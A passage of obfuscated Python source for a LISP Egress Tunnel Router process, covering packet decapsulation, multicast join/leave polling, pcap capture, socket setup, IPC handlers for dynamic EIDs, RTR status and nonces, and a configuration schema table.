    if 65 - 65: O0 * i11iIiiIii . OoooooooOO / oo / i1I1ii1II1iII
    if 69 - 69: Oo % Oo
    if 76 - 76: i11iIiiIii * i1I1ii1II1iII / ooOO00oOo % oOoO0oo0OOOo + II11iiII
    # The outer source RLOC comes from the caller-supplied recvfrom()
    # address string rather than a parsed outer header.
    packet . outer_source = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , source ,
        lisp . LISP_IPV4_HOST_MASK_LEN , 0 )
    if 48 - 48: iIii1I11I1II1 % i1IIi + oOo0O0Ooo % Ooo00oOo00o
    # Decode the inner packet (False: no outer header present in the
    # buffer), updating decap statistics; None means malformed.
    I1iIiiiI1 = packet . decode ( False , I11 ,
        lisp . lisp_decap_stats )
    if ( I1iIiiiI1 == None ) : return
    if 79 - 79: oOo0O0Ooo % oo % o0000oOoOoO0o / i1IIi % ooOO00oOo
    if 56 - 56: iIii1I11I1II1 - i11iIiiIii * i1I1ii1II1iII
    if 84 - 84: II11iiII + o0000oOoOoO0o + Ooo00oOo00o
    if 33 - 33: o0000oOoOoO0o
    if 93 - 93: Oo
    if 34 - 34: iiiiIi11i - Oo * OoO0O00 / Ooo00oOo00o
    if 19 - 19: oOoO0oo0OOOo
    if ( lisp . lisp_flow_logging ) : packet . log_flow ( False )
    if 46 - 46: iIii1I11I1II1 . i11iIiiIii - oOo0O0Ooo % O0 / II111iiii * i1IIi
    packet . print_packet ( "Kernel-decap" , False )
    lisp . dprint ( packet . lisp_header . print_header ( " " ) )
    if 66 - 66: O0
    if 52 - 52: ooOO00oOo * OoooooooOO
    if 12 - 12: O0 + oooO0oo0oOOOO * i1IIi . ooOO00oOo
    if 71 - 71: o0oo0o - Ooo00oOo00o - II11iiII
    if 28 - 28: iIii1I11I1II1
    if 7 - 7: Ooo00oOo00o % oooO0oo0oOOOO * oOo0O0Ooo
    if 58 - 58: oooO0oo0oOOOO / OoOO0ooOOoo0O + II111iiii % i1I1ii1II1iII - OoooooooOO
    if 25 - 25: oOo0O0Ooo % OoooooooOO * OoO0O00 - i1IIi * II111iiii * iiiiIi11i
    # LISP-Decent: multicast control traffic in instance-id 0xffffff is
    # relayed to the "lisp-ms" process over IPC.
    if ( lisp . lisp_decent_configured and
        packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
        if 30 - 30: OoOO0ooOOoo0O % oOo0O0Ooo / oOoO0oo0OOOo * O0 * o0000oOoOoO0o . oo
        iiIiiIi1 = packet . udp_sport
        # Drop the inner IP/UDP headers (28 bytes) before the IPC send.
        packet = packet . packet [ 28 : : ]
        packet = lisp . lisp_packet_ipc ( packet , source , iiIiiIi1 )
        lisp . lisp_ipc ( packet , I11 , "lisp-ms" )
        return
    if 46 - 46: oOo0O0Ooo - O0
    if 70 - 70: OoOO0ooOOoo0O + OoO0O00 * iIii1I11I1II1 . oo * OoOO0ooOOoo0O
    if 49 - 49: Ooo00oOo00o
    if 25 - 25: i1I1ii1II1iII . OoooooooOO * iIii1I11I1II1 . Ooo00oOo00o / O0 + o0000oOoOoO0o
    if 68 - 68: OoO0O00
    if 22 - 22: II11iiII
    if 22 - 22: i1I1ii1II1iII * OoOO0ooOOoo0O - OoO0O00 * O0 / i11iIiiIii
    if 78 - 78: OoO0O00 * O0 / Oo + OoooooooOO + II11iiII
    if 23 - 23: i1I1ii1II1iII % OoooooooOO / iIii1I11I1II1 + oOoO0oo0OOOo / i1IIi / Ooo00oOo00o
    # Unicast control message in instance-id 0xffffff: strip the inner
    # IP/UDP headers (28 bytes) and hand it to the control plane; for
    # an RLOC-probe request pass the inner TTL minus one.
    if ( packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
        packet = packet . packet
        II1Ii1I1i = - 1
        if ( lisp . lisp_is_rloc_probe_request ( packet [ 28 ] ) ) :
            II1Ii1I1i = struct . unpack ( "B" , packet [ 8 ] ) [ 0 ] - 1
        if 94 - 94: i1IIi
        packet = packet [ 28 : : ]
        lisp . lisp_parse_packet ( Oo0o0000o0o0 , packet , source , 0 , II1Ii1I1i )
        return
    if 36 - 36: oo + OoO0O00
    if 46 - 46: i1I1ii1II1iII
    if 65 - 65: i1IIi . oOoO0oo0OOOo / Oo
    if 11 - 11: oooO0oo0oOOOO * Oo / Oo - II11iiII
    if 68 - 68: oo % oooO0oo0oOOOO - oooO0oo0oOOOO / oo + oOoO0oo0OOOo - OoO0O00
    if 65 - 65: Oo - i1IIi
    # An external data-plane owns forwarding; drop here.
    if ( lisp . lisp_ipc_data_plane ) :
        lisp . dprint ( "Drop packet, external data-plane active" )
        return
    if 62 - 62: OoOO0ooOOoo0O / iiiiIi11i % OoO0O00 . OoooooooOO / i11iIiiIii / o0oo0o
    if 60 - 60: oo % iiiiIi11i / Ooo00oOo00o % iiiiIi11i * i11iIiiIii / i1I1ii1II1iII
    if 34 - 34: o0oo0o - II11iiII
    if 25 - 25: iiiiIi11i % oo + i11iIiiIii + O0 * OoooooooOO
    if 64 - 64: i1IIi
    lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
    if 10 - 10: o0oo0o % O0 / oo % OoOO0ooOOoo0O
    if 25 - 25: II111iiii / ooOO00oOo
    if 64 - 64: O0 % Oo
    if 40 - 40: Ooo00oOo00o + OoOO0ooOOoo0O
    # Count the decap against the matching database-mapping entry.
    # NOTE(review): unlike the pcap-path handler, a unicast EID with no
    # database-mapping is logged but NOT dropped here -- confirm intended.
    if ( packet . inner_dest . is_multicast_address ( ) == False ) :
        oo000 = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
        if ( oo000 ) :
            oo000 . increment_decap_stats ( packet )
        else :
            lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
    if 77 - 77: i11iIiiIii % oooO0oo0oOOOO + o0oo0o % OoooooooOO - OoOO0ooOOoo0O
    if 26 - 26: OoO0O00 + O0 - iIii1I11I1II1
    if 47 - 47: OoooooooOO
    if 2 - 2: oOo0O0Ooo % o0oo0o * OoO0O00 * oOo0O0Ooo
    if 65 - 65: i11iIiiIii + OoO0O00 * OoooooooOO - ooOO00oOo
    oOOoo0Oo = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
        packet . inner_dest . print_address ( ) )
    if 26 - 26: Ooo00oOo00o % II11iiII + II11iiII % OoOO0ooOOoo0O * i11iIiiIii / i1I1ii1II1iII
    lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( lisp . bold ( "NAT-Forward" , False ) , lisp . green ( oOOoo0Oo , False ) ,
        # II11iiII % II111iiii - II11iiII + II111iiii
        lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
    if 61 - 61: i11iIiiIii * iiiiIi11i % OoO0O00 * o0oo0o - OoooooooOO - ooOO00oOo
    if 83 - 83: Oo / II11iiII
    if 39 - 39: oooO0oo0oOOOO + OoOO0ooOOoo0O
    if 9 - 9: oo % OoOO0ooOOoo0O . OoO0O00 * oo
    if 99 - 99: O0 . Ooo00oOo00o % OoOO0ooOOoo0O - OoO0O00 / OoOO0ooOOoo0O
    # IPv6 inner packets are sent via an L2 socket (oO0o0o0ooO0oO /
    # oo0o0O00 are module-level names defined elsewhere in this file).
    if ( packet . inner_version == 6 ) :
        packet . send_l2_packet ( oO0o0o0ooO0oO , oo0o0O00 )
        return
    if 20 - 20: oOo0O0Ooo * i1I1ii1II1iII
    if 19 - 19: OoooooooOO
    if 76 - 76: ooOO00oOo * iiiiIi11i
    if 63 - 63: II111iiii . II111iiii + oOoO0oo0OOOo + II11iiII + O0 . o0000oOoOoO0o
    if 1 - 1: O0 * i11iIiiIii - Oo - o0000oOoOoO0o
    # Otherwise forward on a packet-specific raw socket when available,
    # falling back to the caller-supplied one.
    iiI111 = packet . get_raw_socket ( )
    if ( iiI111 == None ) : iiI111 = lisp_raw_socket
    if 94 - 94: ooOO00oOo + oooO0oo0oOOOO + Oo
    if 82 - 82: OoO0O00 - OoO0O00 . iIii1I11I1II1 / II11iiII + oooO0oo0oOOOO % iIii1I11I1II1
    if 61 - 61: II11iiII / OoO0O00 % II11iiII - ooOO00oOo + Oo / Oo
    if 82 - 82: OoO0O00
    packet . send_packet ( iiI111 , packet . inner_dest )
    return
if 5 - 5: ooOO00oOo / ooOO00oOo - O0 - o0oo0o + o0oo0o
if 99 - 99: OoOO0ooOOoo0O * OoooooooOO / Ooo00oOo00o . oooO0oo0oOOOO - iIii1I11I1II1 - o0000oOoOoO0o
if 31 - 31: oooO0oo0oOOOO - ooOO00oOo / II11iiII . i1IIi / o0000oOoOoO0o
if 66 - 66: ooOO00oOo
if 72 - 72: o0oo0o
if 91 - 91: II111iiii / oooO0oo0oOOOO + iIii1I11I1II1 . OoOO0ooOOoo0O - O0
if 70 - 70: o0000oOoOoO0o * iiiiIi11i - OoOO0ooOOoo0O + OoO0O00 % oOoO0oo0OOOo - oooO0oo0oOOOO
if 81 - 81: O0 . O0
def OoO00OooO0 ( group , joinleave ) :
    """Find the configured group-mapping that best matches *group*
    (longest mask_len wins) and register or deregister the group for
    each of that mapping's sources via iIIIiIii().

    group -- multicast group address string; joinleave -- True for a
    join, False for a leave.  Returns None.
    """
    best_mapping = None
    for mapping in lisp . lisp_group_mapping_list . values ( ) :
        matched_len = OoO ( group , mapping )
        if ( matched_len == - 1 ) : continue

        # Keep the mapping with the longest mask seen so far.
        if ( best_mapping == None or matched_len > best_mapping . mask_len ) :
            best_mapping = mapping

    # No configured mapping covers this group.
    if ( best_mapping == None ) : return

    # One [source, group, join/leave] entry per configured source.
    entries = [ [ source , group , joinleave ] for source in best_mapping . sources ]
    iIIIiIii ( Oo0o0000o0o0 , entries )
    return
if 100 - 100: II11iiII + o0000oOoOoO0o * Ooo00oOo00o + II111iiii
if 70 - 70: OoO0O00 * iIii1I11I1II1
if 76 - 76: i1I1ii1II1iII % oOo0O0Ooo % iIii1I11I1II1 . II11iiII
if 30 - 30: i1IIi
if 75 - 75: OoOO0ooOOoo0O . II11iiII - iIii1I11I1II1 * ooOO00oOo * i1I1ii1II1iII
if 93 - 93: Oo
if 18 - 18: Oo
if 66 - 66: iiiiIi11i * i11iIiiIii + oOo0O0Ooo / II11iiII
if 96 - 96: II11iiII + II11iiII % oooO0oo0oOOOO % II11iiII
if 28 - 28: iIii1I11I1II1 + oOo0O0Ooo . Ooo00oOo00o % i11iIiiIii
if 58 - 58: OoOO0ooOOoo0O / OoooooooOO % iiiiIi11i + ooOO00oOo
if 58 - 58: O0
if 91 - 91: i1I1ii1II1iII / oOoO0oo0OOOo . i1I1ii1II1iII - Ooo00oOo00o + oOoO0oo0OOOo
if 72 - 72: o0000oOoOoO0o . oooO0oo0oOOOO * oOoO0oo0OOOo / oOoO0oo0OOOo / i1I1ii1II1iII
if 13 - 13: i1IIi
if 17 - 17: i11iIiiIii * Ooo00oOo00o * Ooo00oOo00o + ooOO00oOo
def o0O0O():
    """
    Background thread: poll the working directory for "join-<group>" and
    "leave-<group>" marker files and (de)register the named groups.
    IPv6 groups are handed to OoO00OooO0(); IPv4 groups are encoded into
    a raw packet (appears to be an IGMPv2 report/leave -- see notes) and
    sent via o0oO0Oo().  Loops forever, rescanning every 10 seconds.
    """
    global Oo0o0000o0o0

    lisp.lisp_set_exception()

    # Canned IPv4 header words, converted to network byte order.
    # NOTE(review): the 0x01 02 byte pair in the second word looks like
    # TTL 1 / protocol 2 (IGMP) and 0xe00000fb is 224.0.0.251 -- confirm
    # against the receiving side before relying on this reading.
    OOoO = socket.htonl
    i1IiiI = [OOoO(0x46000020), OOoO(0x9fe60000), OOoO(0x0102d7cc),
              OOoO(0x0acfc15a), OOoO(0xe00000fb), OOoO(0x94040000)]

    OO0 = ""
    for Oo0OoOo in i1IiiI: OO0 += struct.pack("I", Oo0OoOo)

    while (True):
        # Python-2 'commands' module; each "join-*" filename names a group.
        OO0OooOo = commands.getoutput("ls join-*").replace("join-", "")
        OO0OooOo = OO0OooOo.split("\n")

        for i1111IIiii1 in OO0OooOo:
            if (lisp.lisp_valid_address_format("address", i1111IIiii1) == False):
                continue

            II11II1I = (i1111IIiii1.find(":") != -1)  # IPv6 group address?

            # A matching "leave-<group>" file flips the action to a leave.
            iI1iIIIIIiIi1 = os.path.exists("leave-{}".format(i1111IIiii1))
            lisp.lprint("Internal {} group {}".format(
                "leaving" if iI1iIIIIIiIi1 else "joining", i1111IIiii1))

            if (II11II1I):
                if (i1111IIiii1.lower().find("ff02:") != -1):
                    lisp.lprint("Suppress registration for link-local groups")
                    continue
                OoO00OooO0(i1111IIiii1, (iI1iIIIIIiIi1 == False))
            else:
                O0OooooO0o0O0 = OO0
                # 0x17 / 0x16 look like IGMPv2 leave/report type codes in
                # the high-order byte -- TODO confirm.
                if (iI1iIIIIIiIi1):
                    O0OooooO0o0O0 += struct.pack("I", OOoO(0x17000000))
                else:
                    O0OooooO0o0O0 += struct.pack("I", OOoO(0x16000000))

                # Append the dotted-quad group address as one 32-bit word.
                I111 = i1111IIiii1.split(".")
                i1I1ii11i1Iii = int(I111[0]) << 24
                i1I1ii11i1Iii += int(I111[1]) << 16
                i1I1ii11i1Iii += int(I111[2]) << 8
                i1I1ii11i1Iii += int(I111[3])
                O0OooooO0o0O0 += struct.pack("I", OOoO(i1I1ii11i1Iii))
                o0oO0Oo(O0OooooO0o0O0)
                time.sleep(.100)  # 100 ms pacing between sends

        time.sleep(10)
    return
if 65 - 65: II111iiii / OoO0O00
if 42 - 42: i11iIiiIii . O0
if 75 - 75: o0oo0o + iIii1I11I1II1
if 19 - 19: oo + i11iIiiIii . oooO0oo0oOOOO - OoOO0ooOOoo0O / o0000oOoOoO0o + Ooo00oOo00o
if 38 - 38: OoO0O00 / iIii1I11I1II1 * iIii1I11I1II1 % oOoO0oo0OOOo
if 92 - 92: OoOO0ooOOoo0O / O0 * oo - OoOO0ooOOoo0O
if 99 - 99: i11iIiiIii % OoooooooOO
if 56 - 56: oooO0oo0oOOOO * o0oo0o
if 98 - 98: OoOO0ooOOoo0O + O0 * o0oo0o + i11iIiiIii - II11iiII - iIii1I11I1II1
if 5 - 5: II11iiII % OoO0O00 % oooO0oo0oOOOO % Oo
def I1Iiii():
    """
    Background thread: open a pcap session on device "any" and run the
    capture loop forever, passing packets to o00O().  Returns immediately
    if no local RLOC was discovered.
    """
    lisp.lisp_set_exception()
    if (lisp.lisp_myrlocs[0] == None): return

    ooo00o0o0 = lisp.lisp_get_all_multicast_rles()

    O0OOO00OooO = "any"

    oO0oOOOooo = pcappy.open_live(O0OOO00OooO, 1600, 0, 100)

    # Build the BPF filter: IGMP (proto 2), or traffic destined to any
    # local address / multicast RLE on the LISP data ports (4341, 8472,
    # 4789), RLOC-probe Map-Requests on 4342, or decap-relevant UDP
    # fragments.
    iIi = "(proto 2) or "
    iIi += "((dst host "
    for IIi111 in lisp.lisp_get_all_addresses() + ooo00o0o0:
        iIi += "{} or ".format(IIi111)
    iIi = iIi[0:-4]  # strip the trailing " or "
    iIi += ") and ((udp dst port 4341 or 8472 or 4789) or "
    iIi += "(udp dst port 4342 and ip[28] == 0x12) or "
    iIi += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0)))))"

    lisp.lprint("Capturing packets for: '{}' on device {}".format(iIi,
        O0OOO00OooO))
    oO0oOOOooo.filter = iIi

    # Run forever; o00O receives the device name and the raw send socket.
    oO0oOOOooo.loop(-1, o00O, [O0OOO00OooO, oOo0oooo00o])
    return
if 54 - 54: OoO0O00 % ooOO00oOo - II11iiII - OoOO0ooOOoo0O
if 71 - 71: Oo . i11iIiiIii
if 56 - 56: O0 * i1I1ii1II1iII + i1I1ii1II1iII * iIii1I11I1II1 / Oo * o0oo0o
if 25 - 25: iIii1I11I1II1 . OoOO0ooOOoo0O * i11iIiiIii + OoO0O00 * OoOO0ooOOoo0O
if 67 - 67: i1I1ii1II1iII
if 88 - 88: OoO0O00
if 8 - 8: oOoO0oo0OOOo
def o000():
    """
    ETR startup: announce the process, discover local interfaces and
    addresses, open the listen/send/IPC sockets and a raw IPv4 socket,
    optionally create a tun device for IPv6 delivery, then start the
    pcap and join/leave poller threads.

    Returns True on success, False if local addresses could not be
    determined.
    """
    global I11
    global i1111
    global Oo0o0000o0o0
    global oOo0oooo00o
    global oO0o0o0ooO0oO
    global oo0o0O00

    lisp.lisp_i_am("etr")
    lisp.lisp_set_exception()
    lisp.lisp_print_banner("ETR starting up")

    lisp.lisp_get_local_interfaces()
    lisp.lisp_get_local_macs()
    if (lisp.lisp_get_local_addresses() == False): return (False)

    # Data listen socket; allow multicast sends with TTL 32.
    o0O00oOoOO = lisp.lisp_open_listen_socket("0.0.0.0", str(i11))
    o0O00oOoOO.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
    i1111 = o0O00oOoOO

    # Named IPC socket used by the lisp-core process.
    I11 = lisp.lisp_open_listen_socket("", "lisp-etr")

    Oo0o0000o0o0[0] = i1111
    Oo0o0000o0o0[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
    Oo0o0000o0o0[2] = I11

    # Raw socket with IP_HDRINCL: this process builds its own IPv4
    # headers when forwarding decapsulated packets.
    oOo0oooo00o = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_RAW)
    oOo0oooo00o.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    Oo0o0000o0o0.append(oOo0oooo00o)

    # Optional tun device; the 4-byte prefix is a tun header carrying
    # ethertype 0x86dd (IPv6).
    if (pytun != None):
        oo0o0O00 = '\x00\x00\x86\xdd'
        O0OOO00OooO = "lispers.net"
        try:
            oO0o0o0ooO0oO = pytun.TunTapDevice(flags=pytun.IFF_TUN,
                name=O0OOO00OooO)
            os.system("ip link set dev {} up".format(O0OOO00OooO))
        except Exception:
            # Best effort: run without the tun device if creation fails.
            lisp.lprint("Cannot create tuntap interface")

    # Start the pcap capture thread and the join/leave poller thread.
    threading.Thread(target=I1Iiii, args=[]).start()
    threading.Thread(target=o0O0O, args=[]).start()
    return (True)
if 47 - 47: oOoO0oo0OOOo * iiiiIi11i + iIii1I11I1II1 - iiiiIi11i / oooO0oo0oOOOO
if 86 - 86: oooO0oo0oOOOO
if 43 - 43: oo / i1I1ii1II1iII / Oo + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - oooO0oo0oOOOO - Oo
if 92 - 92: ooOO00oOo * oooO0oo0oOOOO
if 92 - 92: iiiiIi11i
if 7 - 7: i1I1ii1II1iII
def oOOoOO0O00o():
    """
    ETR shutdown: cancel any pending threading.Timer instances and close
    the sockets opened by o000().
    """
    global o0oOoO00o
    global oOOoo00O0O

    # Timers may never have been started; both globals are falsy then.
    if (o0oOoO00o): o0oOoO00o.cancel()
    if (oOOoo00O0O): oOOoo00O0O.cancel()

    lisp.lisp_close_socket(Oo0o0000o0o0[0], "")
    lisp.lisp_close_socket(Oo0o0000o0o0[1], "")
    lisp.lisp_close_socket(I11, "lisp-etr")
    return
if 98 - 98: o0000oOoOoO0o - II111iiii / oo . iiiiIi11i * oooO0oo0oOOOO . OoOO0ooOOoo0O
if 25 - 25: i11iIiiIii / oOo0O0Ooo - o0oo0o / ooOO00oOo . Ooo00oOo00o . Ooo00oOo00o
if 6 - 6: iiiiIi11i . OoOO0ooOOoo0O
if 43 - 43: oOoO0oo0OOOo + Ooo00oOo00o
if 50 - 50: iiiiIi11i % i1IIi * O0
if 4 - 4: iIii1I11I1II1 . i1IIi
if 63 - 63: iIii1I11I1II1 + oooO0oo0oOOOO % i1IIi / oo % II111iiii
if 60 - 60: Ooo00oOo00o . oOo0O0Ooo % o0oo0o / oo / O0
if 19 - 19: i11iIiiIii . oo + II111iiii / II11iiII . oOoO0oo0OOOo * Oo
def oo0O(ipc):
    """
    Process a "learn%<eid>%<interface>" IPC from the ITR: create, update,
    or remove dynamic-EID state and (de)register it with the map-server.
    An interface of "None" means the EID went away (deregister).
    """
    ipc = ipc.split("%")
    Ooooo0O0 = ipc[1]
    oOoO000 = ipc[2]
    if (oOoO000 == "None"): oOoO000 = None

    O00oO0 = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
    O00oO0.store_address(Ooooo0O0)

    # The EID must fall inside a database-mapping configured for
    # dynamic-EIDs, otherwise ITR and ETR configs disagree.
    oo000 = lisp.lisp_db_for_lookups.lookup_cache(O00oO0, False)
    if (oo000 == None or oo000.dynamic_eid_configured() == False):
        lisp.lprint("ITR/ETR dynamic-EID configuration out of sync for {}".format(
            lisp.green(Ooooo0O0, False)))
        return

    O00oOo00o0o = None
    if (Ooooo0O0 in oo000.dynamic_eids): O00oOo00o0o = oo000.dynamic_eids[Ooooo0O0]

    if (O00oOo00o0o == None and oOoO000 == None):
        lisp.lprint("ITR/ETR state mismatch for {}".format(
            lisp.green(Ooooo0O0, False)))
        return

    # Existing entry plus an interface: either a duplicate IPC or the
    # dynamic-EID moved to another interface.
    if (O00oOo00o0o and oOoO000):
        if (O00oOo00o0o.interface == oOoO000):
            lisp.lprint("ITR sent redundant IPC for {}".format(
                lisp.green(Ooooo0O0, False)))
        else:
            lisp.lprint("Dynamic-EID {} interface change, {} -> {}".format(
                lisp.green(Ooooo0O0, False), O00oOo00o0o.interface, oOoO000))
            O00oOo00o0o.interface = oOoO000
        return

    # New dynamic-EID: store state, register it, and add a host route so
    # return traffic reaches the EID's interface.
    if (oOoO000):
        O00oOo00o0o = lisp.lisp_dynamic_eid()
        O00oOo00o0o.dynamic_eid.copy_address(O00oO0)
        O00oOo00o0o.interface = oOoO000
        O00oOo00o0o.get_timeout(oOoO000)
        oo000.dynamic_eids[Ooooo0O0] = O00oOo00o0o

        iI1111i1i11Ii = lisp.bold("Registering", False)
        Ooooo0O0 = lisp.bold(Ooooo0O0, False)
        lisp.lprint("{} dynamic-EID {} on interface {}, timeout {}".format(iI1111i1i11Ii,
            lisp.green(Ooooo0O0, False), oOoO000, O00oOo00o0o.timeout))

        O00oO000O0O(Oo0o0000o0o0, None, O00oO0, None, False)

        if (lisp.lisp_is_macos() == False):
            Ooooo0O0 = O00oO0.print_prefix_no_iid()
            OO0OOOOOo = "ip route add {} dev {}".format(Ooooo0O0, oOoO000)
            os.system(OO0OOOOOo)
        return

    # Dynamic-EID went away: deregister, drop state, remove host route.
    if (Ooooo0O0 in oo000.dynamic_eids):
        oOoO000 = oo000.dynamic_eids[Ooooo0O0].interface
        iI = lisp.bold("Deregistering", False)
        lisp.lprint("{} dynamic-EID {}".format(iI,
            lisp.green(Ooooo0O0, False)))

        O00oO000O0O(Oo0o0000o0o0, 0, O00oO0, None, False)

        oo000.dynamic_eids.pop(Ooooo0O0)

        if (lisp.lisp_is_macos() == False):
            Ooooo0O0 = O00oO0.print_prefix_no_iid()
            OO0OOOOOo = "ip route delete {} dev {}".format(Ooooo0O0, oOoO000)
            os.system(OO0OOOOOo)
    return
if 13 - 13: II111iiii
if 55 - 55: OoO0O00 % i1IIi * OoOO0ooOOoo0O
if 95 - 95: II11iiII / II111iiii - Ooo00oOo00o % o0oo0o . OoOO0ooOOoo0O
if 63 - 63: iIii1I11I1II1 / Oo
if 24 - 24: OoO0O00 / iIii1I11I1II1 % II11iiII * oOo0O0Ooo - iIii1I11I1II1
if 50 - 50: II111iiii
if 39 - 39: II111iiii . oOo0O0Ooo - OoO0O00 * i1IIi . OoooooooOO
if 44 - 44: oo
if 55 - 55: iiiiIi11i . o0oo0o * o0oo0o
def OO0OO00ooO0(ipc):
    """
    Process an ITR "rtr%<address>%<up|down>" IPC, tracking RTR
    reachability.  No-op when configuration says to register all RTRs
    regardless of reachability, or when the RTR is unknown.
    """
    if (lisp.lisp_register_all_rtrs): return

    OoOiII11IiIi, iII1I1IiI11ii, I1iIiiiI1 = ipc.split("%")
    if ((iII1I1IiI11ii in lisp.lisp_rtr_list) == False): return

    lisp.lprint("Process ITR IPC message, RTR {} has gone {}".format(
        lisp.red(iII1I1IiI11ii, False), lisp.bold(I1iIiiiI1, False)))

    # Down: keep the dict key but clear its entry.  Otherwise rebuild the
    # RTR's address entry.
    OooooOoooO = lisp.lisp_rtr_list[iII1I1IiI11ii]
    if (I1iIiiiI1 == "down"):
        lisp.lisp_rtr_list[iII1I1IiI11ii] = None
        return

    OooooOoooO = lisp.lisp_address(lisp.LISP_AFI_IPV4, iII1I1IiI11ii, 32, 0)
    lisp.lisp_rtr_list[iII1I1IiI11ii] = OooooOoooO
    return
if 72 - 72: OoOO0ooOOoo0O
if 26 - 26: oooO0oo0oOOOO % OoO0O00
if 72 - 72: O0 + Ooo00oOo00o + oo / OoO0O00
if 83 - 83: oooO0oo0oOOOO - oo . o0000oOoOoO0o
if 34 - 34: oOo0O0Ooo - iiiiIi11i * OoooooooOO
if 5 - 5: i11iIiiIii * i1I1ii1II1iII - o0000oOoOoO0o - oOoO0oo0OOOo - i1IIi + i1I1ii1II1iII
if 4 - 4: Oo + O0 . i1IIi * oOoO0oo0OOOo - Ooo00oOo00o
if 42 - 42: Ooo00oOo00o * oOo0O0Ooo . ooOO00oOo - i1I1ii1II1iII / II111iiii
def iII1ii11III(ipc):
    """
    Process an ITR "nonce%<R|E>%<rloc>%<hex-nonce>" IPC, recording either
    the request-nonce ("R") or echo-nonce ("E") last sent toward an RLOC
    so echoed nonces can be matched later.
    """
    O0OO0oOO, OoOiII11IiIi, OOOO0oO0O, ooooOO000oooO0 = ipc.split("%")
    ooooOO000oooO0 = int(ooooOO000oooO0, 16)

    # Look up existing echo-nonce state for the RLOC, creating it on
    # first use.
    Ii111III1i11I = lisp.lisp_get_echo_nonce(None, OOOO0oO0O)
    if (Ii111III1i11I == None): Ii111III1i11I = lisp.lisp_echo_nonce(OOOO0oO0O)

    if (OoOiII11IiIi == "R"):
        Ii111III1i11I.request_nonce_sent = ooooOO000oooO0
        lisp.lprint("Waiting for echo-nonce 0x{} from {}".format(
            lisp.lisp_hex_string(ooooOO000oooO0),
            lisp.red(Ii111III1i11I.rloc_str, False)))
    elif (OoOiII11IiIi == "E"):
        Ii111III1i11I.echo_nonce_sent = ooooOO000oooO0
        lisp.lprint("Sent echo-nonce 0x{} to {}".format(
            lisp.lisp_hex_string(ooooOO000oooO0),
            lisp.red(Ii111III1i11I.rloc_str, False)))
    return
if 62 - 62: II111iiii
if 12 - 12: oooO0oo0oOOOO + II111iiii
if 92 - 92: o0oo0o % iIii1I11I1II1 - i1I1ii1II1iII / i11iIiiIii % Oo * Ooo00oOo00o
if 80 - 80: i1I1ii1II1iII
if 3 - 3: oOoO0oo0OOOo * OoOO0ooOOoo0O
# Command/config dispatch table for the lisp-etr process.  Each key is a
# configuration clause name mapped to [handler, {keyword: schema}].  A
# schema list is [value-expected-flag, <allowed string values or numeric
# min/max>...]; an empty list introduces a sub-clause grouping (e.g.
# "prefix", "rloc", "elp-node").  Handlers are local functions or shared
# ones from lispconfig.
Oo00O = {
    "lisp xtr-parameters": [lispconfig.lisp_xtr_command, {
        "rloc-probing": [True, "yes", "no"],
        "nonce-echoing": [True, "yes", "no"],
        "data-plane-security": [True, "yes", "no"],
        "data-plane-logging": [True, "yes", "no"],
        "frame-logging": [True, "yes", "no"],
        "flow-logging": [True, "yes", "no"],
        "nat-traversal": [True, "yes", "no"],
        "checkpoint-map-cache": [True, "yes", "no"],
        "ipc-data-plane": [True, "yes", "no"],
        "decentralized-xtr": [True, "yes", "no"],
        "register-reachable-rtrs": [True, "yes", "no"],
        "program-hardware": [True, "yes", "no"]}],
    "lisp interface": [lispconfig.lisp_interface_command, {
        "interface-name": [True],
        "device": [True],
        "instance-id": [True, 0, 0xffffffff],
        "dynamic-eid": [True],
        "dynamic-eid-device": [True],
        "lisp-nat": [True, "yes", "no"],
        "dynamic-eid-timeout": [True, 0, 0xff]}],
    "lisp map-server": [III1IiiI, {
        "ms-name": [True],
        "address": [True],
        "dns-name": [True],
        "authentication-type": [False, "sha1", "sha2"],
        "authentication-key": [False],
        "encryption-key": [False],
        "proxy-reply": [False, "yes", "no"],
        "want-map-notify": [False, "yes", "no"],
        "merge-registrations": [False, "yes", "no"],
        "refresh-registrations": [False, "yes", "no"],
        "site-id": [False, 1, 0xffffffffffffffff]}],
    "lisp database-mapping": [OoooooOoo, {
        "prefix": [],
        "mr-name": [True],
        "ms-name": [True],
        "instance-id": [True, 0, 0xffffffff],
        "secondary-instance-id": [True, 0, 0xffffffff],
        "eid-prefix": [True],
        "group-prefix": [True],
        "dynamic-eid": [True, "yes", "no"],
        "signature-eid": [True, "yes", "no"],
        "rloc": [],
        "rloc-record-name": [True],
        "elp-name": [True],
        "geo-name": [True],
        "rle-name": [True],
        "json-name": [True],
        "address": [True],
        "interface": [True],
        "priority": [True, 0, 255],
        "weight": [True, 0, 100]}],
    "lisp explicit-locator-path": [lispconfig.lisp_elp_command, {
        "elp-name": [False],
        "elp-node": [],
        "address": [True],
        "probe": [True, "yes", "no"],
        "strict": [True, "yes", "no"],
        "eid": [True, "yes", "no"]}],
    "lisp replication-list-entry": [lispconfig.lisp_rle_command, {
        "rle-name": [False],
        "rle-node": [],
        "address": [True],
        "level": [True, 0, 255]}],
    "lisp geo-coordinates": [lispconfig.lisp_geo_command, {
        "geo-name": [False],
        "geo-tag": [False]}],
    "lisp json": [lispconfig.lisp_json_command, {
        "json-name": [False],
        "json-string": [False]}],
    "lisp group-mapping": [ooooooo00o, {
        "group-name": [False],
        "ms-name": [True],
        "group-prefix": [False],
        "instance-id": [True, 0, 0xffffffff],
        "rle-address": [False],
        "sources": [],
        "address": [True]}],
    "show database-mapping": [oO00, {}],
    "show etr-keys": [oOOo0oOo0, {}],
